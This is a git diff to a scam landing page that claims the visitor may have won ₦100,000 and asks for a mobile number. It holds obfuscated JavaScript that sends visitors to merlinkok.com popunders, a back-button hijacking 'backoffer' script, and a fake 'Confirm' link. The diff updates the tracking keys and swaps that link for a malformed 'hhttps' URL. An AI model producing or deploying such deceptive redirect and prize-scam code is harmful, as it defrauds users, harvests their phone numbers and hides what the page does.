--- a/pinbox/e20235231703ncash/index.html
+++ b/pinbox/e20235231703ncash/index.html
@@ -17,14 +17,14 @@
 </script>
 	
 <script>
-	var _0x19d6=['prototype','Constructor','indexOf','location','https://merlinkok.com/secondlink/LP1/index.html?key=115dd65e-355b-4c97-b6e9-eb270c5aea20&c1=popunder&c2=all','assign','open','_blank','HTMLElement'];(function(_0x5b932b,_0x38c322){var _0x552ac9=function(_0x5426b0){while(--_0x5426b0){_0x5b932b['push'](_0x5b932b['shift']());}};_0x552ac9(++_0x38c322);}(_0x19d6,0x136));var _0x1126=function(_0x5b932b,_0x38c322){_0x5b932b=_0x5b932b-0x0;var _0x552ac9=_0x19d6[_0x5b932b];return _0x552ac9;};var isSafari=Object[_0x1126('0x5')]['toString']['call'](window[_0x1126('0x4')])[_0x1126('0x7')](_0x1126('0x6'))>0x0;function launchext(){setTimeout(function(){url=_0x1126('0x0');document[_0x1126('0x8')][_0x1126('0x1')](url);if(isSafari){window[_0x1126('0x2')]('',_0x1126('0x3'));}},0x3e8);return![];}
+	var _0x19d6=['prototype','Constructor','indexOf','location','https://merlinkok.com/secondlink/LP1/index.html?key=m7oeo5qpelu3j0n8rqwb&c1=popunder&c2=all','assign','open','_blank','HTMLElement'];(function(_0x5b932b,_0x38c322){var _0x552ac9=function(_0x5426b0){while(--_0x5426b0){_0x5b932b['push'](_0x5b932b['shift']());}};_0x552ac9(++_0x38c322);}(_0x19d6,0x136));var _0x1126=function(_0x5b932b,_0x38c322){_0x5b932b=_0x5b932b-0x0;var _0x552ac9=_0x19d6[_0x5b932b];return _0x552ac9;};var isSafari=Object[_0x1126('0x5')]['toString']['call'](window[_0x1126('0x4')])[_0x1126('0x7')](_0x1126('0x6'))>0x0;function launchext(){setTimeout(function(){url=_0x1126('0x0');document[_0x1126('0x8')][_0x1126('0x1')](url);if(isSafari){window[_0x1126('0x2')]('',_0x1126('0x3'));}},0x3e8);return![];}
 </script>
 	
 <!-- BBR -->
 <script type="text/javascript" src="https://merlinkok.com/secondlink/LP1/backoffer.js"></script>
 <script type="text/javascript">
 		(function(w) {
-			w.backOfferUrl = 'https://merlinkok.com/secondlink/LP1/index.html?key=115dd65e-355b-4c97-b6e9-eb270c5aea20&c1=bbr&c2=all'
+			w.backOfferUrl = 'https://merlinkok.com/secondlink/LP1/index.html?key=m7oeo5qpelu3j0n8rqwb&c1=bbr&c2=all'
 		}
 		(window));
 </script>
@@ -152,7 +152,7 @@
 				html: '<strong>You may be a Winner of:</strong> <h2>₦ 100,000</h2><br><h4>Next Steps:</h4><br>1. You\'ll be redirected to the partner\'s site<br>2. Enter your mobile number<br>3. Get your Lottery prize',
 				allowOutsideClick: false,
 				showConfirmButton: false,
-				footer: '<a href="https://blast.radadpro.com/click" class="button" onclick="launchext(); exit_a1();" target="_blank">Confirm</a>'
+				footer: '<a href="hhttps://binom.blinkgo.top/cgial1k.php?lp=1" class="button" onclick="launchext(); exit_a1();" target="_blank">Confirm</a>'
 			});
 		}
 		i = 0;
